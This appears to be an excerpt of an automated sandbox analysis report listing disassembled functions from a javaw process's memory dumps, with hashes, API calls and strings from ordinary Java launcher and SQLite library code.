Opcode ID: 402ec5620acca4c764d047b5d19ac15ac75af21a52e203fc6f4afab310dadb93
Instruction ID: d2c3c426d6f56caa4048bdb4853c11904751459964bc0295ff386adef8a7ddb2
Opcode Fuzzy Hash: 402ec5620acca4c764d047b5d19ac15ac75af21a52e203fc6f4afab310dadb93
Instruction Fuzzy Hash: 3C4160B0A087468BD7049F69D58436EBBF9FF85744F15C42ED8888B348EBB9D4818B52

Function 6FA7ED23 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 54stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 6FA7ED61

Strings

master, xrefs: 6FA7ED80
temp_schema, xrefs: 6FA7ED6C
schema, xrefs: 6FA7ED95
temp_master, xrefs: 6FA7ED4E

Memory Dump Source

Source File: 00000010.00000002.3209036591.000000006FA71000.00000020.00000001.01000000.00000017.sdmp, Offset: 6FA70000, based on PE: true

Associated: 00000010.00000002.3209010161.000000006FA70000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209113880.000000006FB26000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209139949.000000006FB29000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209165683.000000006FB3E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209188887.000000006FB3F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209217085.000000006FB40000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209241179.000000006FB43000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6fa70000_javaw.jbxd

Similarity

API ID: strcmp
String ID: master$schema$temp_master$temp_schema
API String ID: 1004003707-1832909115
Opcode ID: 40b21f1ec43c4f227cef5188085080dca804c8038ad3420206e92621cbf5f09f
Instruction ID: e686aee12151f65ef2d73c005ddc2dea1ebdca49f3177c1c81a0f813b849fe26
Opcode Fuzzy Hash: 40b21f1ec43c4f227cef5188085080dca804c8038ad3420206e92621cbf5f09f
Instruction Fuzzy Hash: 8C0171B570C39157E7101A799AC0BA666D8AF85648F054439ED0CCB38AFEF9EC8057E1

Function 6FB209E6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 6FB20A24
fputc.MSVCRT ref: 6FB20AD7
fputc.MSVCRT ref: 6FB20B31

Strings

0, xrefs: 6FB20A16

Memory Dump Source

Source File: 00000010.00000002.3209036591.000000006FA71000.00000020.00000001.01000000.00000017.sdmp, Offset: 6FA70000, based on PE: true

Associated: 00000010.00000002.3209010161.000000006FA70000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209113880.000000006FB26000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209139949.000000006FB29000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209165683.000000006FB3E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209188887.000000006FB3F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209217085.000000006FB40000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209241179.000000006FB43000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6fa70000_javaw.jbxd

Similarity

API ID: fputc$memset
String ID: 0
API String ID: 2944404495-4108050209
Opcode ID: f5e969d23ea7e590a3d5075dff2a6e44bf53c50b6e27a090c3e631d389ef01b5
Instruction ID: 6f287afd2e134f1c97eff6df3babe895f5837f009c7db1ea09569b233e1f9f6c
Opcode Fuzzy Hash: f5e969d23ea7e590a3d5075dff2a6e44bf53c50b6e27a090c3e631d389ef01b5
Instruction Fuzzy Hash: 85414C71A047428FD710CF68D5A47AAB7F1FF49384F509A2DD99E97684E335F8028B40

Function 00E025ED Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00E025F7

Strings

(Z[B)Ljava/lang/String;, xrefs: 00E02656
makePlatformString, xrefs: 00E0265B
Error: A JNI error has occurred, please check your installation and try again, xrefs: 00E02699

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: _strlen
String ID: (Z[B)Ljava/lang/String;$Error: A JNI error has occurred, please check your installation and try again$makePlatformString
API String ID: 4218353326-1765258479
Opcode ID: 2a3fc61f979be4edac36201be812cdac73f16d65f0e97253a7c3161322668dce
Instruction ID: a6afcfe1969b6b54bca5ab492e38171277b9c68166b0c47656682785e4403d46
Opcode Fuzzy Hash: 2a3fc61f979be4edac36201be812cdac73f16d65f0e97253a7c3161322668dce
Instruction Fuzzy Hash: A72192712012116FD724DF62EC88EAB77ECEF85754F20146DF941AB281DB629841CE61

Function 6FB20C1B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 6FB20AD7
fputc.MSVCRT ref: 6FB20B31
memset.MSVCRT ref: 6FB20C55

Strings

0, xrefs: 6FB20C4A

Memory Dump Source

Source File: 00000010.00000002.3209036591.000000006FA71000.00000020.00000001.01000000.00000017.sdmp, Offset: 6FA70000, based on PE: true

Associated: 00000010.00000002.3209010161.000000006FA70000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209113880.000000006FB26000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209139949.000000006FB29000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209165683.000000006FB3E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209188887.000000006FB3F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209217085.000000006FB40000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209241179.000000006FB43000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6fa70000_javaw.jbxd

Similarity

API ID: fputc$memset
String ID: 0
API String ID: 2944404495-4108050209
Opcode ID: 83b5336506753224b49f08bb65817cecf0aab02266adab68bac423b05b9e8d11
Instruction ID: 12e61d9aad8616471f552d5deec5103276fc313443c36582c79febfbe1c6a72f
Opcode Fuzzy Hash: 83b5336506753224b49f08bb65817cecf0aab02266adab68bac423b05b9e8d11
Instruction Fuzzy Hash: 9121F972A05B428BD310CF29D1A476AB7F2FF85384F509A2DD4EE8B694E335F8418B40

Function 00E06754 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 70COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00E06761
_strpbrk.LIBCMT ref: 00E0678B

Strings

.-_, xrefs: 00E06799, 00E0679F, 00E067B7, 00E067C9
&+*, xrefs: 00E06785

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: _strlen_strpbrk
String ID: &+*$.-_
API String ID: 1970528640-274609856
Opcode ID: 58bcbc5c985d715ba3ab1737681e199a64c1889bdc711954e8d6c788934fee26
Instruction ID: e7c5e2f2d863fd1eeb69b3d982bc3342d3729345722da5babc06132f691894c5
Opcode Fuzzy Hash: 58bcbc5c985d715ba3ab1737681e199a64c1889bdc711954e8d6c788934fee26
Instruction Fuzzy Hash: 8811083610866F1FE73251249851BBB6BDD8F067BCB2C281BE494F94C2EA019CF14260

Function 00E1FD3B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

Strings

`!, xrefs: 00E1FD3D

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID:
String ID: `!
API String ID: 0-867017424
Opcode ID: b235d2cf539f645d397eb57cef56a4e1ff3b21bcd232e599fcecf1a6f6a83d49
Instruction ID: ced436a0b929e4991bb292025eddf73149d33ebbdf7fa40b13dd232f11fe7e0c
Opcode Fuzzy Hash: b235d2cf539f645d397eb57cef56a4e1ff3b21bcd232e599fcecf1a6f6a83d49
Instruction Fuzzy Hash: 8F118E316112049FD711BBBAEC467FD7BE4AF09714F186024F501BA293DBB089C087A1

Function 00E05AE8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 55windowCOMMON

Download Yara Rule

APIs

__vsnprintf.LIBCMT ref: 00E05B1A
MessageBoxA.USER32(00000000,00000000,Java Virtual Machine Launcher,00000010), ref: 00E05B30

Strings

JVM_FindClassFromBootLoader, xrefs: 00E05AF2
Java Virtual Machine Launcher, xrefs: 00E05B28

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: Message__vsnprintf
String ID: JVM_FindClassFromBootLoader$Java Virtual Machine Launcher
API String ID: 540648154-2728474055
Opcode ID: 9d3754bf09adac8768a2a25c43488e10c21267a514392af44577b6ba3f08c762
Instruction ID: a1e3bb92f586ff4ad8c25b823c9ce9835b6cc121fce6978ce7e8dad006b4f548
Opcode Fuzzy Hash: 9d3754bf09adac8768a2a25c43488e10c21267a514392af44577b6ba3f08c762
Instruction Fuzzy Hash: 8701D873048614BAE7247BA19C47FFB3B9C9B05B10F146119F60D7E0C6E971B5D087A5

Function 00E05F1F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000001,Software\JavaSoft\Java Runtime Environment,00000000,00020019,00000000), ref: 00E05F4F
RegCloseKey.ADVAPI32 ref: 00E05F75

Part of subcall function 00E05F9D: RegEnumKeyA.ADVAPI32(80000001,00000000,?,00000104), ref: 00E05FD9
Part of subcall function 00E05F9D: RegEnumKeyA.ADVAPI32(80000001,00000001,?,00000104), ref: 00E0602F
Part of subcall function 00E05F9D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?), ref: 00E0604B
Part of subcall function 00E05F9D: RegCloseKey.ADVAPI32 ref: 00E06064

RegCloseKey.ADVAPI32 ref: 00E05F90

Strings

Software\JavaSoft\Java Runtime Environment, xrefs: 00E05F46

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: Close$EnumOpen
String ID: Software\JavaSoft\Java Runtime Environment
API String ID: 138425441-786720643
Opcode ID: 0c835ff68fd05040b517710b0593f1524e4bfc663939ae1eb6ed70f9d4f51a56
Instruction ID: b97242dbc9d6b8964c93c4a8d33bbf5d961b066431930fa63a3abe214d757cb3
Opcode Fuzzy Hash: 0c835ff68fd05040b517710b0593f1524e4bfc663939ae1eb6ed70f9d4f51a56
Instruction Fuzzy Hash: C201AD32A00A19FFDF219F94DD09B9EBBB9EB00304F205065E801B10A1E7B48E89EF40

Function 00E0372D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00E03742
_strlen.LIBCMT ref: 00E0374B
_strlen.LIBCMT ref: 00E03758

Strings

-Djava.class.path=%s, xrefs: 00E03769

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: _strlen
String ID: -Djava.class.path=%s
API String ID: 4218353326-2416158790
Opcode ID: 524ccc7fab5d0b7fa95c20e07717e12a790654178941c73e2bd672d42acc79ee
Instruction ID: 9699dc090637ba77d0367a0e4a7cca477f1b76736bfcc5246ae1e6ebe5d1583a
Opcode Fuzzy Hash: 524ccc7fab5d0b7fa95c20e07717e12a790654178941c73e2bd672d42acc79ee
Instruction Fuzzy Hash: 50F0E2B34002107AC6213335BC43BAFA6ED8F81754F096519F400770C39A709AC240B2

Function 00E0C873 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000011,00000000,00000800,?,00E0C824,00000000,00000001,00E37070,?,?,?,00E0C9C7,00000004,InitializeCriticalSectionEx,00E2EAEC,InitializeCriticalSectionEx), ref: 00E0C880
GetLastError.KERNEL32(?,00E0C824,00000000,00000001,00E37070,?,?,?,00E0C9C7,00000004,InitializeCriticalSectionEx,00E2EAEC,InitializeCriticalSectionEx,00000000,?,00E0C747), ref: 00E0C88A
LoadLibraryExW.KERNEL32(00000011,00000000,00000000,?,00000011,00E0C263), ref: 00E0C8B2

Strings

api-ms-, xrefs: 00E0C897

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 67e1fe5e5cd378174e47d42b325b37b0ca930959249572b975b3918d2150c057
Instruction ID: 664ac17b78f61c7f8030dde2de8144b0cec882f20a07796819a3ce8eb3235633
Opcode Fuzzy Hash: 67e1fe5e5cd378174e47d42b325b37b0ca930959249572b975b3918d2150c057
Instruction Fuzzy Hash: 86E04830640308BBEB241B51EC06F593F65BF10B45F24A431FA0EB40E1D761A895D558

Function 6FB25A88 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6FB25AA2
strchr.MSVCRT ref: 6FB25AB2
atoi.MSVCRT ref: 6FB25AC3

Strings

., xrefs: 6FB25AA7

Memory Dump Source

Source File: 00000010.00000002.3209036591.000000006FA71000.00000020.00000001.01000000.00000017.sdmp, Offset: 6FA70000, based on PE: true

Associated: 00000010.00000002.3209010161.000000006FA70000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209113880.000000006FB26000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209139949.000000006FB29000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209165683.000000006FB3E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209188887.000000006FB3F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209217085.000000006FB40000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209241179.000000006FB43000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6fa70000_javaw.jbxd

Similarity

API ID: atoisetlocalestrchr
String ID: .
API String ID: 1223908000-248832578
Opcode ID: 2e20cc0a2f8bd01d80a18571f6e875e0734c2b59010ac96151a74daf2c5f9a7c
Instruction ID: c90a61ba31fb57f933c407c291ca22bae921a1503460f92655425ae9eb7a0fa8
Opcode Fuzzy Hash: 2e20cc0a2f8bd01d80a18571f6e875e0734c2b59010ac96151a74daf2c5f9a7c
Instruction Fuzzy Hash: 05E0ECB59047444AD7006F3CD51933EB6E1AF85704F89896CD48C87288E77998459B5A

Function 6FA4186C Relevance: 6.4, APIs: 5, Instructions: 147COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,0000000C,?,?,00000000,?,?,?,?,?,?,6FA41146,?,?,?), ref: 6FA418C7
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,00000000,0000000C,?,?,00000000,?,?,?,?,?,?,6FA41146,?,?), ref: 6FA418E1
memcpy.VCRUNTIME140(?,00000001,?,00000000,?,?,?), ref: 6FA419C3
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6FA419EC
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,00000000,00000000), ref: 6FA419F2

Memory Dump Source

Source File: 00000010.00000002.3208903167.000000006FA41000.00000020.00000001.01000000.00000018.sdmp, Offset: 6FA40000, based on PE: true

Associated: 00000010.00000002.3208878111.000000006FA40000.00000002.00000001.01000000.00000018.sdmpDownload File
Associated: 00000010.00000002.3208933024.000000006FA56000.00000002.00000001.01000000.00000018.sdmpDownload File
Associated: 00000010.00000002.3208959533.000000006FA5F000.00000004.00000001.01000000.00000018.sdmpDownload File
Associated: 00000010.00000002.3208984957.000000006FA60000.00000002.00000001.01000000.00000018.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6fa40000_javaw.jbxd

Similarity

API ID: memset$freemallocmemcpy
String ID:
API String ID: 3693777188-0
Opcode ID: 0b30bcdee569ae43c85be39e13012c7404e89c472202a9f8c8ab61dff7daccd9
Instruction ID: 61ee558b1a630b4dda4991bf509c28347814187dfa052e582c090664e7b9df88
Opcode Fuzzy Hash: 0b30bcdee569ae43c85be39e13012c7404e89c472202a9f8c8ab61dff7daccd9
Instruction Fuzzy Hash: 1141D176908305AFD301DFA4CD40FABBBEDAF8535CF04092AFA50C6141E739E5A587A2

Function 00E1E914 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(F3FD1227,00000000,00000000,?), ref: 00E1E977

Part of subcall function 00E1D159: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00E242AA,?,00000000,-00000008), ref: 00E1D1BA

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00E1EBC9
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00E1EC0F
GetLastError.KERNEL32 ref: 00E1ECB2

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: ee95b10ac36e4586c7344d8ad762070d3614af72724a659e965b8842e09a3757
Instruction ID: c51de102e7007335f8276eaea674734dbf7658d98e09ba574275f6693532ebbc
Opcode Fuzzy Hash: ee95b10ac36e4586c7344d8ad762070d3614af72724a659e965b8842e09a3757
Instruction Fuzzy Hash: 83D18AB5D042989FCB14CFA8C8849EDFBB5FF49314F28516AE856FB351D630A981CB50

Function 6FAB7CB9 Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 297stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6FAB7CE8
strlen.MSVCRT ref: 6FAB7EB6

Strings

sqlite3_extension_init, xrefs: 6FAB7D2B
te3_, xrefs: 6FAB7E11

Memory Dump Source

Source File: 00000010.00000002.3209036591.000000006FA71000.00000020.00000001.01000000.00000017.sdmp, Offset: 6FA70000, based on PE: true

Associated: 00000010.00000002.3209010161.000000006FA70000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209113880.000000006FB26000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209139949.000000006FB29000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209165683.000000006FB3E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209188887.000000006FB3F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209217085.000000006FB40000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209241179.000000006FB43000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6fa70000_javaw.jbxd

Similarity

API ID: strlen
String ID: sqlite3_extension_init$te3_
API String ID: 39653677-3968575867
Opcode ID: 5359d3b2f5fe27b9adca668df2a5eb8ce9e3efd1f10270b19fea6eab23797ff6
Instruction ID: 5c50785dc199e3998e89c76d942af94174bdcbfd4ccdc7ce67f8094398e7c762
Opcode Fuzzy Hash: 5359d3b2f5fe27b9adca668df2a5eb8ce9e3efd1f10270b19fea6eab23797ff6
Instruction Fuzzy Hash: 7BD1C0B4A053099FDB00DF68D584AADBBF5BF48344F05852EE8989B350DB78E981CF51

Function 00E0CDAA Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00E0CE71
___AdjustPointer.LIBCMT ref: 00E0CE94
___AdjustPointer.LIBCMT ref: 00E0CF30

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: fb3290be6a9385448a834ba4095f212bd796466cc421ddf37a21f6acb1478de3
Instruction ID: 55bfda8e33838b2a2543094b45d82bdb52c012945d997e98bee36ba4ac031265
Opcode Fuzzy Hash: fb3290be6a9385448a834ba4095f212bd796466cc421ddf37a21f6acb1478de3
Instruction Fuzzy Hash: 5D51EF72605206AFDB299F54D841BBA77E5EF04304F34622DE945B72E1E731ACD2CB90

Function 6FB197F4 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 134stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6FB19844
strlen.MSVCRT ref: 6FB1988B
strlen.MSVCRT ref: 6FB198D4

Strings

simple, xrefs: 6FB198B7, 6FB198CC

Memory Dump Source

Source File: 00000010.00000002.3209036591.000000006FA71000.00000020.00000001.01000000.00000017.sdmp, Offset: 6FA70000, based on PE: true

Associated: 00000010.00000002.3209010161.000000006FA70000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209113880.000000006FB26000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209139949.000000006FB29000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209165683.000000006FB3E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209188887.000000006FB3F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209217085.000000006FB40000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209241179.000000006FB43000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6fa70000_javaw.jbxd

Similarity

API ID: strlen
String ID: simple
API String ID: 39653677-3246079234
Opcode ID: 0fe239f2ab41cde41731331eca597a5f944f982cf1c4e545f232b00e9fe1d841
Instruction ID: 80fdde02bc0e4d6f02ad9841df95902a387367cc00bda7ddb07d0b7d97a99152
Opcode Fuzzy Hash: 0fe239f2ab41cde41731331eca597a5f944f982cf1c4e545f232b00e9fe1d841
Instruction Fuzzy Hash: F7510670A08389DBDB00DFA9E584A9EB7F4FF49344F018929E894AB354DB35E841CF51

Function 6D529840 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 130COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000006), ref: 6D529886

Strings

sun.java.command, xrefs: 6D529922
sun.jvm.flags, xrefs: 6D5299B5
sun.jvm.args, xrefs: 6D529A2D

Memory Dump Source

Source File: 00000010.00000002.3208148704.000000006D411000.00000020.00000001.01000000.00000010.sdmp, Offset: 6D410000, based on PE: true

Associated: 00000010.00000002.3208123124.000000006D410000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208367361.000000006D6F6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208435880.000000006D796000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208465304.000000006D797000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208490609.000000006D798000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208513617.000000006D79A000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208537460.000000006D79C000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208563923.000000006D79D000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208588233.000000006D79E000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208611080.000000006D79F000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208636785.000000006D7A7000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208660137.000000006D7A9000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208690761.000000006D7AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208713812.000000006D7AE000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7B9000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7BC000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7CB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7D1000.00000004.00000001.01000000.00000010.sdmpDownload File
